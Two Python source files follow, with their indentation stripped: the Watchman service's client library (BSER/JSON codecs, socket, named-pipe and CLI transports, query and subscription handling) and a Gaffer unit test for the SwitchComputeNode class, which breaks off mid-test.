# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# no unicode literals
import inspect
import os
import math
import socket
import subprocess
import time
# Sometimes it's really hard to get Python extensions to compile,
# so fall back to a pure Python implementation.
try:
from . import bser
# Demandimport causes modules to be loaded lazily. Force the load now
# so that we can fall back on pybser if bser doesn't exist
bser.pdu_info
except ImportError:
from . import pybser as bser
from . import (
capabilities,
compat,
encoding,
load,
)
if os.name == 'nt':
import ctypes
import ctypes.wintypes
wintypes = ctypes.wintypes
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_FLAG_OVERLAPPED = 0x40000000
OPEN_EXISTING = 3
INVALID_HANDLE_VALUE = -1
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200
WAIT_FAILED = 0xFFFFFFFF
WAIT_TIMEOUT = 0x00000102
WAIT_OBJECT_0 = 0x00000000
WAIT_IO_COMPLETION = 0x000000C0
INFINITE = 0xFFFFFFFF
# Overlapped I/O operation is in progress. (997)
ERROR_IO_PENDING = 0x000003E5
# The pointer size follows the architecture
# We use WPARAM since this type is already conditionally defined
ULONG_PTR = ctypes.wintypes.WPARAM
class OVERLAPPED(ctypes.Structure):
_fields_ = [
("Internal", ULONG_PTR), ("InternalHigh", ULONG_PTR),
("Offset", wintypes.DWORD), ("OffsetHigh", wintypes.DWORD),
("hEvent", wintypes.HANDLE)
]
def __init__(self):
self.Internal = 0
self.InternalHigh = 0
self.Offset = 0
self.OffsetHigh = 0
self.hEvent = 0
LPDWORD = ctypes.POINTER(wintypes.DWORD)
CreateFile = ctypes.windll.kernel32.CreateFileA
CreateFile.argtypes = [wintypes.LPSTR, wintypes.DWORD, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD,
wintypes.HANDLE]
CreateFile.restype = wintypes.HANDLE
CloseHandle = ctypes.windll.kernel32.CloseHandle
CloseHandle.argtypes = [wintypes.HANDLE]
CloseHandle.restype = wintypes.BOOL
ReadFile = ctypes.windll.kernel32.ReadFile
ReadFile.argtypes = [wintypes.HANDLE, wintypes.LPVOID, wintypes.DWORD,
LPDWORD, ctypes.POINTER(OVERLAPPED)]
ReadFile.restype = wintypes.BOOL
WriteFile = ctypes.windll.kernel32.WriteFile
WriteFile.argtypes = [wintypes.HANDLE, wintypes.LPVOID, wintypes.DWORD,
LPDWORD, ctypes.POINTER(OVERLAPPED)]
WriteFile.restype = wintypes.BOOL
GetLastError = ctypes.windll.kernel32.GetLastError
GetLastError.argtypes = []
GetLastError.restype = wintypes.DWORD
SetLastError = ctypes.windll.kernel32.SetLastError
SetLastError.argtypes = [wintypes.DWORD]
SetLastError.restype = None
FormatMessage = ctypes.windll.kernel32.FormatMessageA
FormatMessage.argtypes = [wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD,
wintypes.DWORD, ctypes.POINTER(wintypes.LPSTR),
wintypes.DWORD, wintypes.LPVOID]
FormatMessage.restype = wintypes.DWORD
LocalFree = ctypes.windll.kernel32.LocalFree
GetOverlappedResult = ctypes.windll.kernel32.GetOverlappedResult
GetOverlappedResult.argtypes = [wintypes.HANDLE,
ctypes.POINTER(OVERLAPPED), LPDWORD,
wintypes.BOOL]
GetOverlappedResult.restype = wintypes.BOOL
GetOverlappedResultEx = getattr(ctypes.windll.kernel32,
'GetOverlappedResultEx', None)
if GetOverlappedResultEx is not None:
GetOverlappedResultEx.argtypes = [wintypes.HANDLE,
ctypes.POINTER(OVERLAPPED), LPDWORD,
wintypes.DWORD, wintypes.BOOL]
GetOverlappedResultEx.restype = wintypes.BOOL
WaitForSingleObjectEx = ctypes.windll.kernel32.WaitForSingleObjectEx
WaitForSingleObjectEx.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.BOOL]
WaitForSingleObjectEx.restype = wintypes.DWORD
CreateEvent = ctypes.windll.kernel32.CreateEventA
CreateEvent.argtypes = [LPDWORD, wintypes.BOOL, wintypes.BOOL,
wintypes.LPSTR]
CreateEvent.restype = wintypes.HANDLE
# Windows Vista is the minimum supported client for CancelIoEx.
CancelIoEx = ctypes.windll.kernel32.CancelIoEx
CancelIoEx.argtypes = [wintypes.HANDLE, ctypes.POINTER(OVERLAPPED)]
CancelIoEx.restype = wintypes.BOOL
# 2 bytes marker, 1 byte int size, 8 bytes int64 value
sniff_len = 13
# This is a helper for debugging the client.
_debugging = False
if _debugging:
def log(fmt, *args):
print('[%s] %s' %
(time.strftime("%a, %d %b %Y %H:%M:%S", time.gmtime()),
fmt % args[:]))
else:
def log(fmt, *args):
pass
def _win32_strerror(err):
""" expand a win32 error code into a human readable message """
# FormatMessage will allocate memory and assign it here
buf = ctypes.c_char_p()
FormatMessage(
FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER
| FORMAT_MESSAGE_IGNORE_INSERTS, None, err, 0, buf, 0, None)
try:
return buf.value
finally:
LocalFree(buf)
class WatchmanError(Exception):
def __init__(self, msg=None, cmd=None):
self.msg = msg
self.cmd = cmd
def setCommand(self, cmd):
self.cmd = cmd
def __str__(self):
if self.cmd:
return '%s, while executing %s' % (self.msg, self.cmd)
return self.msg
class BSERv1Unsupported(WatchmanError):
pass
class WatchmanEnvironmentError(WatchmanError):
def __init__(self, msg, errno, errmsg, cmd=None):
super(WatchmanEnvironmentError, self).__init__(
'{0}: errno={1} errmsg={2}'.format(msg, errno, errmsg),
cmd)
class SocketConnectError(WatchmanError):
def __init__(self, sockpath, exc):
super(SocketConnectError, self).__init__(
'unable to connect to %s: %s' % (sockpath, exc))
self.sockpath = sockpath
self.exc = exc
class SocketTimeout(WatchmanError):
"""A specialized exception raised for socket timeouts during communication to/from watchman.
This makes it easier to implement non-blocking loops as callers can easily distinguish
between a routine timeout and an actual error condition.
Note that catching WatchmanError will also catch this as it is a super-class, so backwards
compatibility in exception handling is preserved.
"""
class CommandError(WatchmanError):
"""error returned by watchman
self.msg is the message returned by watchman.
"""
def __init__(self, msg, cmd=None):
super(CommandError, self).__init__(
'watchman command error: %s' % (msg, ),
cmd,
)
class Transport(object):
""" communication transport to the watchman server """
buf = None
def close(self):
""" tear it down """
raise NotImplementedError()
def readBytes(self, size):
""" read size bytes """
raise NotImplementedError()
def write(self, buf):
""" write some data """
raise NotImplementedError()
def setTimeout(self, value):
pass
def readLine(self):
""" read a line
Maintains its own buffer, callers of the transport should not mix
calls to readBytes and readLine.
"""
if self.buf is None:
self.buf = []
# Buffer may already have a line if we've received unilateral
# response(s) from the server
if len(self.buf) == 1 and b"\n" in self.buf[0]:
(line, b) = self.buf[0].split(b"\n", 1)
self.buf = [b]
return line
while True:
b = self.readBytes(4096)
if b"\n" in b:
result = b''.join(self.buf)
(line, b) = b.split(b"\n", 1)
self.buf = [b]
return result + line
self.buf.append(b)
class Codec(object):
""" communication encoding for the watchman server """
transport = None
def __init__(self, transport):
self.transport = transport
def receive(self):
raise NotImplementedError()
def send(self, *args):
raise NotImplementedError()
def setTimeout(self, value):
self.transport.setTimeout(value)
class UnixSocketTransport(Transport):
""" local unix domain socket transport """
sock = None
def __init__(self, sockpath, timeout):
self.sockpath = sockpath
self.timeout = timeout
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.settimeout(self.timeout)
sock.connect(self.sockpath)
self.sock = sock
except socket.error as e:
sock.close()
raise SocketConnectError(self.sockpath, e)
def close(self):
self.sock.close()
self.sock = None
def setTimeout(self, value):
self.timeout = value
self.sock.settimeout(self.timeout)
def readBytes(self, size):
try:
buf = [self.sock.recv(size)]
if not buf[0]:
raise WatchmanError('empty watchman response')
return buf[0]
except socket.timeout:
raise SocketTimeout('timed out waiting for response')
def write(self, data):
try:
self.sock.sendall(data)
except socket.timeout:
raise SocketTimeout('timed out sending query command')
def _get_overlapped_result_ex_impl(pipe, olap, nbytes, millis, alertable):
""" Windows 7 and earlier does not support GetOverlappedResultEx. The
alternative is to use GetOverlappedResult and wait for read or write
operation to complete. This is done be using CreateEvent and
WaitForSingleObjectEx. CreateEvent, WaitForSingleObjectEx
and GetOverlappedResult are all part of Windows API since WindowsXP.
This is the exact same implementation that can be found in the watchman
source code (see get_overlapped_result_ex_impl in stream_win.c). This
way, maintenance should be simplified.
"""
log('Preparing to wait for maximum %dms', millis )
if millis != 0:
waitReturnCode = WaitForSingleObjectEx(olap.hEvent, millis, alertable)
if waitReturnCode == WAIT_OBJECT_0:
# Event is signaled, overlapped IO operation result should be available.
pass
elif waitReturnCode == WAIT_IO_COMPLETION:
# WaitForSingleObjectEx returnes because the system added an I/O completion
# routine or an asynchronous procedure call (APC) to the thread queue.
SetLastError(WAIT_IO_COMPLETION)
pass
elif waitReturnCode == WAIT_TIMEOUT:
# We reached the maximum allowed wait time, the IO operation failed
# to complete in timely fashion.
SetLastError(WAIT_TIMEOUT)
return False
elif waitReturnCode == WAIT_FAILED:
# something went wrong calling WaitForSingleObjectEx
err = GetLastError()
log('WaitForSingleObjectEx failed: %s', _win32_strerror(err))
return False
else:
# unexpected situation deserving investigation.
err = GetLastError()
log('Unexpected error: %s', _win32_strerror(err))
return False
return GetOverlappedResult(pipe, olap, nbytes, False)
class WindowsNamedPipeTransport(Transport):
""" connect to a named pipe """
def __init__(self, sockpath, timeout):
self.sockpath = sockpath
self.timeout = int(math.ceil(timeout * 1000))
self._iobuf = None
self.pipe = CreateFile(sockpath, GENERIC_READ | GENERIC_WRITE, 0, None,
OPEN_EXISTING, FILE_FLAG_OVERLAPPED, None)
if self.pipe == INVALID_HANDLE_VALUE:
self.pipe = None
self._raise_win_err('failed to open pipe %s' % sockpath,
GetLastError())
# event for the overlapped I/O operations
self._waitable = CreateEvent(None, True, False, None)
if self._waitable is None:
self._raise_win_err('CreateEvent failed', GetLastError())
self._get_overlapped_result_ex = GetOverlappedResultEx
if (os.getenv('WATCHMAN_WIN7_COMPAT') == '1' or
self._get_overlapped_result_ex is None):
self._get_overlapped_result_ex = _get_overlapped_result_ex_impl
def _raise_win_err(self, msg, err):
raise IOError('%s win32 error code: %d %s' %
(msg, err, _win32_strerror(err)))
def close(self):
if self.pipe:
log('Closing pipe')
CloseHandle(self.pipe)
self.pipe = None
if self._waitable is not None:
# We release the handle for the event
CloseHandle(self._waitable)
self._waitable = None
def setTimeout(self, value):
# convert to milliseconds
self.timeout = int(value * 1000)
def readBytes(self, size):
""" A read can block for an unbounded amount of time, even if the
kernel reports that the pipe handle is signalled, so we need to
always perform our reads asynchronously
"""
# try to satisfy the read from any buffered data
if self._iobuf:
if size >= len(self._iobuf):
res = self._iobuf
self.buf = None
return res
res = self._iobuf[:size]
self._iobuf = self._iobuf[size:]
return res
# We need to initiate a read
buf = ctypes.create_string_buffer(size)
olap = OVERLAPPED()
olap.hEvent = self._waitable
log('made read buff of size %d', size)
# ReadFile docs warn against sending in the nread parameter for async
# operations, so we always collect it via GetOverlappedResultEx
immediate = ReadFile(self.pipe, buf, size, None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err('failed to read %d bytes' % size,
GetLastError())
nread = wintypes.DWORD()
if not self._get_overlapped_result_ex(self.pipe, olap, nread,
0 if immediate else self.timeout,
True):
err = GetLastError()
CancelIoEx(self.pipe, olap)
if err == WAIT_TIMEOUT:
log('GetOverlappedResultEx timedout')
raise SocketTimeout('timed out after waiting %dms for read' %
self.timeout)
log('GetOverlappedResultEx reports error %d', err)
self._raise_win_err('error while waiting for read', err)
nread = nread.value
if nread == 0:
# Docs say that named pipes return 0 byte when the other end did
# a zero byte write. Since we don't ever do that, the only
# other way this shows up is if the client has gotten in a weird
# state, so let's bail out
CancelIoEx(self.pipe, olap)
raise IOError('Async read yielded 0 bytes; unpossible!')
# Holds precisely the bytes that we read from the prior request
buf = buf[:nread]
returned_size = min(nread, size)
if returned_size == nread:
return buf
# keep any left-overs around for a later read to consume
self._iobuf = buf[returned_size:]
return buf[:returned_size]
def write(self, data):
olap = OVERLAPPED()
olap.hEvent = self._waitable
immediate = WriteFile(self.pipe, ctypes.c_char_p(data), len(data),
None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err('failed to write %d bytes' % len(data),
GetLastError())
# Obtain results, waiting if needed
nwrote = wintypes.DWORD()
if self._get_overlapped_result_ex(self.pipe, olap, nwrote,
0 if immediate else self.timeout,
True):
log('made write of %d bytes', nwrote.value)
return nwrote.value
err = GetLastError()
# It's potentially unsafe to allow the write to continue after
# we unwind, so let's make a best effort to avoid that happening
CancelIoEx(self.pipe, olap)
if err == WAIT_TIMEOUT:
raise SocketTimeout('timed out after waiting %dms for write' %
self.timeout)
self._raise_win_err('error while waiting for write of %d bytes' %
len(data), err)
class CLIProcessTransport(Transport):
""" open a pipe to the cli to talk to the service
This intended to be used only in the test harness!
The CLI is an oddball because we only support JSON input
and cannot send multiple commands through the same instance,
so we spawn a new process for each command.
We disable server spawning for this implementation, again, because
it is intended to be used only in our test harness. You really
should not need to use the CLI transport for anything real.
While the CLI can output in BSER, our Transport interface doesn't
support telling this instance that it should do so. That effectively
limits this implementation to JSON input and output only at this time.
It is the responsibility of the caller to set the send and
receive codecs appropriately.
"""
proc = None
closed = True
def __init__(self, sockpath, timeout):
self.sockpath = sockpath
self.timeout = timeout
def close(self):
if self.proc:
if self.proc.pid is not None:
self.proc.kill()
self.proc.stdin.close()
self.proc.stdout.close()
self.proc.wait()
self.proc = None
def _connect(self):
if self.proc:
return self.proc
args = [
'watchman',
'--sockname={0}'.format(self.sockpath),
'--logfile=/BOGUS',
'--statefile=/BOGUS',
'--no-spawn',
'--no-local',
'--no-pretty',
'-j',
]
self.proc = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
return self.proc
def readBytes(self, size):
self._connect()
res = self.proc.stdout.read(size)
if res == '':
raise WatchmanError('EOF on CLI process transport')
return res
def write(self, data):
if self.closed:
self.close()
self.closed = False
self._connect()
res = self.proc.stdin.write(data)
self.proc.stdin.close()
self.closed = True
return res
class BserCodec(Codec):
""" use the BSER encoding. This is the default, preferred codec """
def __init__(self, transport, value_encoding, value_errors):
super(BserCodec, self).__init__(transport)
self._value_encoding = value_encoding
self._value_errors = value_errors
def _loads(self, response):
return bser.loads(
response,
value_encoding=self._value_encoding,
value_errors=self._value_errors,
)
def receive(self):
buf = [self.transport.readBytes(sniff_len)]
if not buf[0]:
raise WatchmanError('empty watchman response')
_1, _2, elen = bser.pdu_info(buf[0])
rlen = len(buf[0])
while elen > rlen:
buf.append(self.transport.readBytes(elen - rlen))
rlen += len(buf[-1])
response = b''.join(buf)
try:
res = self._loads(response)
return res
except ValueError as e:
raise WatchmanError('watchman response decode error: %s' % e)
def send(self, *args):
cmd = bser.dumps(*args) # Defaults to BSER v1
self.transport.write(cmd)
class ImmutableBserCodec(BserCodec):
""" use the BSER encoding, decoding values using the newer
immutable object support """
def _loads(self, response):
return bser.loads(
response,
False,
value_encoding=self._value_encoding,
value_errors=self._value_errors,
)
class Bser2WithFallbackCodec(BserCodec):
""" use BSER v2 encoding """
def __init__(self, transport, value_encoding, value_errors):
super(Bser2WithFallbackCodec, self).__init__(
transport,
value_encoding,
value_errors,
)
if compat.PYTHON3:
bserv2_key = 'required'
else:
bserv2_key = 'optional'
self.send(["version", {bserv2_key: ["bser-v2"]}])
capabilities = self.receive()
if 'error' in capabilities:
raise BSERv1Unsupported(
'The watchman server version does not support Python 3. Please '
'upgrade your watchman server.'
)
if capabilities['capabilities']['bser-v2']:
self.bser_version = 2
self.bser_capabilities = 0
else:
self.bser_version = 1
self.bser_capabilities = 0
def receive(self):
buf = [self.transport.readBytes(sniff_len)]
if not buf[0]:
raise WatchmanError('empty watchman response')
recv_bser_version, recv_bser_capabilities, elen = bser.pdu_info(buf[0])
if hasattr(self, 'bser_version'):
# Readjust BSER version and capabilities if necessary
self.bser_version = max(self.bser_version, recv_bser_version)
self.capabilities = self.bser_capabilities & recv_bser_capabilities
rlen = len(buf[0])
while elen > rlen:
buf.append(self.transport.readBytes(elen - rlen))
rlen += len(buf[-1])
response = b''.join(buf)
try:
res = self._loads(response)
return res
except ValueError as e:
raise WatchmanError('watchman response decode error: %s' % e)
def send(self, *args):
if hasattr(self, 'bser_version'):
cmd = bser.dumps(*args, version=self.bser_version,
capabilities=self.bser_capabilities)
else:
cmd = bser.dumps(*args)
self.transport.write(cmd)
class ImmutableBser2Codec(Bser2WithFallbackCodec, ImmutableBserCodec):
""" use the BSER encoding, decoding values using the newer
immutable object support """
pass
class JsonCodec(Codec):
""" Use json codec. This is here primarily for testing purposes """
json = None
def __init__(self, transport):
super(JsonCodec, self).__init__(transport)
# optional dep on json, only if JsonCodec is used
import json
self.json = json
def receive(self):
line = self.transport.readLine()
try:
# In Python 3, json.loads is a transformation from Unicode string to
# objects possibly containing Unicode strings. We typically expect
# the JSON blob to be ASCII-only with non-ASCII characters escaped,
# but it's possible we might get non-ASCII bytes that are valid
# UTF-8.
if compat.PYTHON3:
line = line.decode('utf-8')
return self.json.loads(line)
except Exception as e:
print(e, line)
raise
def send(self, *args):
cmd = self.json.dumps(*args)
# In Python 3, json.dumps is a transformation from objects possibly
# containing Unicode strings to Unicode string. Even with (the default)
# ensure_ascii=True, dumps returns a Unicode string.
if compat.PYTHON3:
cmd = cmd.encode('ascii')
self.transport.write(cmd + b"\n")
class client(object):
""" Handles the communication with the watchman service """
sockpath = None
transport = None
sendCodec = None
recvCodec = None
sendConn = None
recvConn = None
subs = {} # Keyed by subscription name
sub_by_root = {} # Keyed by root, then by subscription name
logs = [] # When log level is raised
unilateral = ['log', 'subscription']
tport = None
useImmutableBser = None
def __init__(self,
sockpath=None,
timeout=1.0,
transport=None,
sendEncoding=None,
recvEncoding=None,
useImmutableBser=False,
# use False for these last two because None has a special
# meaning
valueEncoding=False,
valueErrors=False):
self.sockpath = sockpath
self.timeout = timeout
self.useImmutableBser = useImmutableBser
if inspect.isclass(transport) and issubclass(transport, Transport):
self.transport = transport
else:
transport = transport or os.getenv('WATCHMAN_TRANSPORT') or 'local'
if transport == 'local' and os.name == 'nt':
self.transport = WindowsNamedPipeTransport
elif transport == 'local':
self.transport = UnixSocketTransport
elif transport == 'cli':
self.transport = CLIProcessTransport
if sendEncoding is None:
sendEncoding = 'json'
if recvEncoding is None:
recvEncoding = sendEncoding
else:
raise WatchmanError('invalid transport %s' % transport)
sendEncoding = str(sendEncoding or os.getenv('WATCHMAN_ENCODING') or
'bser')
recvEncoding = str(recvEncoding or os.getenv('WATCHMAN_ENCODING') or
'bser')
self.recvCodec = self._parseEncoding(recvEncoding)
self.sendCodec = self._parseEncoding(sendEncoding)
# We want to act like the native OS methods as much as possible. This
# means returning bytestrings on Python 2 by default and Unicode
# strings on Python 3. However we take an optional argument that lets
# users override this.
if valueEncoding is False:
if compat.PYTHON3:
self.valueEncoding = encoding.get_local_encoding()
self.valueErrors = encoding.default_local_errors
else:
self.valueEncoding = None
self.valueErrors = None
else:
self.valueEncoding = valueEncoding
if valueErrors is False:
self.valueErrors = encoding.default_local_errors
else:
self.valueErrors = valueErrors
def _makeBSERCodec(self, codec):
def make_codec(transport):
return codec(transport, self.valueEncoding, self.valueErrors)
return make_codec
def _parseEncoding(self, enc):
if enc == 'bser':
if self.useImmutableBser:
return self._makeBSERCodec(ImmutableBser2Codec)
return self._makeBSERCodec(Bser2WithFallbackCodec)
elif enc == 'bser-v1':
if compat.PYTHON3:
raise BSERv1Unsupported(
'Python 3 does not support the BSER v1 encoding: specify '
'"bser" or omit the sendEncoding and recvEncoding '
'arguments')
if self.useImmutableBser:
return self._makeBSERCodec(ImmutableBserCodec)
return self._makeBSERCodec(BserCodec)
elif enc == 'json':
return JsonCodec
else:
raise WatchmanError('invalid encoding %s' % enc)
def _hasprop(self, result, name):
if self.useImmutableBser:
return hasattr(result, name)
return name in result
def _resolvesockname(self):
# if invoked via a trigger, watchman will set this env var; we
# should use it unless explicitly set otherwise
path = os.getenv('WATCHMAN_SOCK')
if path:
return path
cmd = ['watchman', '--output-encoding=bser', 'get-sockname']
try:
args = dict(stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=os.name != 'nt')
if os.name == 'nt':
# if invoked via an application with graphical user interface,
# this call will cause a brief command window pop-up.
# Using the flag STARTF_USESHOWWINDOW to avoid this behavior.
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
args['startupinfo'] = startupinfo
p = subprocess.Popen(cmd, **args)
except OSError as e:
raise WatchmanError('"watchman" executable not in PATH (%s)', e)
stdout, stderr = p.communicate()
exitcode = p.poll()
if exitcode:
raise WatchmanError("watchman exited with code %d" % exitcode)
result = bser.loads(stdout)
if 'error' in result:
raise WatchmanError('get-sockname error: %s' % result['error'])
return result['sockname']
def _connect(self):
""" establish transport connection """
if self.recvConn:
return
if self.sockpath is None:
self.sockpath = self._resolvesockname()
self.tport = self.transport(self.sockpath, self.timeout)
self.sendConn = self.sendCodec(self.tport)
self.recvConn = self.recvCodec(self.tport)
def __del__(self):
self.close()
def close(self):
if self.tport:
self.tport.close()
self.tport = None
self.recvConn = None
self.sendConn = None
def receive(self):
""" receive the next PDU from the watchman service
If the client has activated subscriptions or logs then
this PDU may be a unilateral PDU sent by the service to
inform the client of a log event or subscription change.
It may also simply be the response portion of a request
initiated by query.
There are clients in production that subscribe and call
this in a loop to retrieve all subscription responses,
so care should be taken when making changes here.
"""
self._connect()
result = self.recvConn.receive()
if self._hasprop(result, 'error'):
raise CommandError(result['error'])
if self._hasprop(result, 'log'):
self.logs.append(result['log'])
if self._hasprop(result, 'subscription'):
sub = result['subscription']
if not (sub in self.subs):
self.subs[sub] = []
self.subs[sub].append(result)
# also accumulate in {root,sub} keyed store
root = os.path.normpath(os.path.normcase(result['root']))
if not root in self.sub_by_root:
self.sub_by_root[root] = {}
if not sub in self.sub_by_root[root]:
self.sub_by_root[root][sub] = []
self.sub_by_root[root][sub].append(result)
return result
def isUnilateralResponse(self, res):
if 'unilateral' in res and res['unilateral']:
return True
# Fall back to checking for known unilateral responses
for k in self.unilateral:
if k in res:
return True
return False
def getLog(self, remove=True):
""" Retrieve buffered log data
If remove is true the data will be removed from the buffer.
Otherwise it will be left in the buffer
"""
res = self.logs
if remove:
self.logs = []
return res
def getSubscription(self, name, remove=True, root=None):
""" Retrieve the data associated with a named subscription
If remove is True (the default), the subscription data is removed
from the buffer. Otherwise the data is returned but left in
the buffer.
Returns None if there is no data associated with `name`
If root is not None, then only return the subscription
data that matches both root and name. When used in this way,
remove processing impacts both the unscoped and scoped stores
for the subscription data.
"""
if root is not None:
root = os.path.normpath(os.path.normcase(root))
if root not in self.sub_by_root:
return None
if name not in self.sub_by_root[root]:
return None
sub = self.sub_by_root[root][name]
if remove:
del self.sub_by_root[root][name]
# don't let this grow unbounded
if name in self.subs:
del self.subs[name]
return sub
if name not in self.subs:
return None
sub = self.subs[name]
if remove:
del self.subs[name]
return sub
def query(self, *args):
""" Send a query to the watchman service and return the response
This call will block until the response is returned.
If any unilateral responses are sent by the service in between
the request-response they will be buffered up in the client object
and NOT returned via this method.
"""
log('calling client.query')
self._connect()
try:
self.sendConn.send(args)
res = self.receive()
while self.isUnilateralResponse(res):
res = self.receive()
return res
except EnvironmentError as ee:
# When we can depend on Python 3, we can use PEP 3134
# exception chaining here.
raise WatchmanEnvironmentError(
'I/O error communicating with watchman daemon',
ee.errno,
ee.strerror,
args)
except WatchmanError as ex:
ex.setCommand(args)
raise
def capabilityCheck(self, optional=None, required=None):
""" Perform a server capability check """
res = self.query('version', {
'optional': optional or [],
'required': required or []
})
if not self._hasprop(res, 'capabilities'):
# Server doesn't support capabilities, so we need to
# synthesize the results based on the version
capabilities.synthesize(res, optional)
if 'error' in res:
raise CommandError(res['error'])
return res
def setTimeout(self, value):
self.recvConn.setTimeout(value)
self.sendConn.setTimeout(value)
| |
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
import Gaffer
import GafferTest
class SwitchTest( GafferTest.TestCase ) :
def intSwitch( self ) :
result = Gaffer.SwitchComputeNode()
result["in"] = Gaffer.IntPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
result["out"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
return result
def colorSwitch( self ) :
result = Gaffer.SwitchComputeNode()
result["in"] = Gaffer.Color3fPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
result["out"] = Gaffer.Color3fPlug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
return result
def intPlug( self, value ) :
result = Gaffer.IntPlug()
result.setValue( value )
# we need to keep it alive for the duration of the
# test - it'll be cleaned up in tearDown().
self.__inputPlugs.append( result )
return result
def colorPlug( self, value ) :
result = Gaffer.Color3fPlug()
result.setValue( value )
# we need to keep it alive for the duration of the
# test - it'll be cleaned up in tearDown().
self.__inputPlugs.append( result )
return result
def test( self ) :
n = self.intSwitch()
n["in"].setInput( self.intPlug( 0 ) )
n["in1"].setInput( self.intPlug( 1 ) )
n["in2"].setInput( self.intPlug( 2 ) )
n["index"].setValue( 0 )
self.assertEqual( n["out"].hash(), n["in"].hash() )
self.assertEqual( n["out"].getValue(), n["in"].getValue() )
n["index"].setValue( 1 )
self.assertEqual( n["out"].hash(), n["in1"].hash() )
self.assertEqual( n["out"].getValue(), n["in1"].getValue() )
n["index"].setValue( 2 )
self.assertEqual( n["out"].hash(), n["in2"].hash() )
self.assertEqual( n["out"].getValue(), n["in2"].getValue() )
def testCorrespondingInput( self ) :
n = self.intSwitch()
self.assertTrue( n.correspondingInput( n["out"] ).isSame( n["in"] ) )
def testDisabling( self ) :
n = self.intSwitch()
n["in"].setInput( self.intPlug( 0 ) )
n["in1"].setInput( self.intPlug( 1 ) )
n["index"].setValue( 1 )
self.assertEqual( n["out"].hash(), n["in1"].hash() )
self.assertEqual( n["out"].getValue(), n["in1"].getValue() )
n["enabled"].setValue( False )
self.assertEqual( n["out"].hash(), n["in"].hash() )
self.assertEqual( n["out"].getValue(), n["in"].getValue() )
n["enabled"].setValue( True )
self.assertEqual( n["out"].hash(), n["in1"].hash() )
self.assertEqual( n["out"].getValue(), n["in1"].getValue() )
self.assertTrue( n["enabled"].isSame( n.enabledPlug() ) )
def testAffects( self ) :
n = self.intSwitch()
n["in"].setInput( self.intPlug( 0 ) )
n["in1"].setInput( self.intPlug( 0 ) )
for name in [ "enabled", "index", "in", "in1" ] :
a = n.affects( n[name] )
self.assertEqual( len( a ), 1 )
self.assertTrue( a[0].isSame( n["out"] ) )
self.assertEqual( n.affects( n["out"] ), [] )
def testOutOfRangeIndex( self ) :
n = self.intSwitch()
n["in"].setInput( self.intPlug( 0 ) )
n["in1"].setInput( self.intPlug( 1 ) )
n["in2"].setInput( self.intPlug( 2 ) )
n["index"].setValue( 2 )
self.assertEqual( n["out"].hash(), n["in2"].hash() )
self.assertEqual( n["out"].getValue(), n["in2"].getValue() )
# wrap around if the index is out of range
n["index"].setValue( 3 )
self.assertEqual( n["out"].hash(), n["in"].hash() )
self.assertEqual( n["out"].getValue(), n["in"].getValue() )
n["index"].setValue( 4 )
self.assertEqual( n["out"].hash(), n["in1"].hash() )
self.assertEqual( n["out"].getValue(), n["in1"].getValue() )
n["index"].setValue( 5 )
self.assertEqual( n["out"].hash(), n["in2"].hash() )
self.assertEqual( n["out"].getValue(), n["in2"].getValue() )
def testAffectsIgnoresAdditionalPlugs( self ) :
n = self.intSwitch()
n["myPlug"] = Gaffer.IntPlug()
n["indubitablyNotAnInputBranch"] = Gaffer.IntPlug()
